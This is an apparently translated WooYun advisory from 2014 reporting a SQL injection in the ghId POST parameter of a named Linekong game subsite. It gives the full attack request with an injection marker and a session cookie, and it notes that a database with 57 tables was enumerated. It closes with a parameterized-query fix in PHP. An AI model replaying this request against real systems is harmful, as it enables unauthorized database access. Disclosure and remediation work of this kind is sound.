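Vulnerability summary

Bug ID: wooyun-2014-078554

Title: A POST injection in a Linekong subsite

Vendor: linekong.com

Author: Eoh

Submitted: 2014-10-10 14:50

Fixed: 2014-10-15 14:52

Disclosed: 2014-10-15 14:52

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]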


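Vulnerability details

Disclosure status:

2014-10-10: Details reported to the vendor; awaiting vendor handling
2014-10-15: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Dangerous characters in user input are not properly sanitized.

Detailed description:

The vulnerable parameter is ghId: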
POST /activity/clan3/_do_getPlayerList.ajax.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ms.linekong.com
Cookie: PHPSESSID=oon708apra935clk8l8a78cck0
Host: ms.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

ghId=*&page=1


Proof of vulnerability:

[Image: sqli_banner.jpg]


Database: ms_web
[57 tables]

Remediation:

Use parameterized SQL statements.
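
One way to apply this remediation to a ghId/page lookup, as an added example that is not the vendor's code or part of the original report. It assumes PHP with PDO; the in-memory SQLite database, the guild_member table, its columns, and the function names are hypothetical stand-ins.

```php
<?php
declare(strict_types=1);

// Added example. SQLite in memory stands in for the site's database, and the
// guild_member table and its columns are hypothetical, built for this demo.
function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE guild_member (gh_id INTEGER, player TEXT)');
    $db->exec("INSERT INTO guild_member VALUES (1,'alice'),(1,'bob'),(1,'carol'),(2,'dave')");
    return $db;
}

// Pattern to avoid: "... WHERE gh_id = " . $_POST['ghId'] puts request data
// into the SQL text itself. Below, the SQL text is fixed and values are bound.
function getPlayerList(PDO $db, array $post, int $pageSize = 2): array
{
    // Validate types and ranges before the values get anywhere near a query.
    $range = ['options' => ['min_range' => 1, 'max_range' => 1000000]];
    $ghId = filter_var($post['ghId'] ?? null, FILTER_VALIDATE_INT, $range);
    $page = filter_var($post['page'] ?? 1, FILTER_VALIDATE_INT, $range);
    if ($ghId === false || $page === false) {
        throw new InvalidArgumentException('ghId and page must be integers in 1..1000000');
    }

    $stmt = $db->prepare(
        'SELECT player FROM guild_member WHERE gh_id = :gh
         ORDER BY player LIMIT :lim OFFSET :off'
    );
    $stmt->bindValue(':gh', $ghId, PDO::PARAM_INT);
    $stmt->bindValue(':lim', $pageSize, PDO::PARAM_INT);
    $stmt->bindValue(':off', ($page - 1) * $pageSize, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = openDemoDb();
// Constructed request bodies: one well-formed, one with a non-integer ghId.
foreach ([['ghId' => '1', 'page' => '2'], ['ghId' => "1'", 'page' => '1']] as $post) {
    try {
        echo json_encode(getPlayerList($db, $post)), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Binding alone keeps request data out of the SQL text; the integer validation in front of it additionally turns malformed input into a clean rejection instead of a database error.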

Copyright notice: when reposting, please credit the source Eoh@WooYun


Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2014-10-15 14:52

Vendor reply:

Latest status:

None yet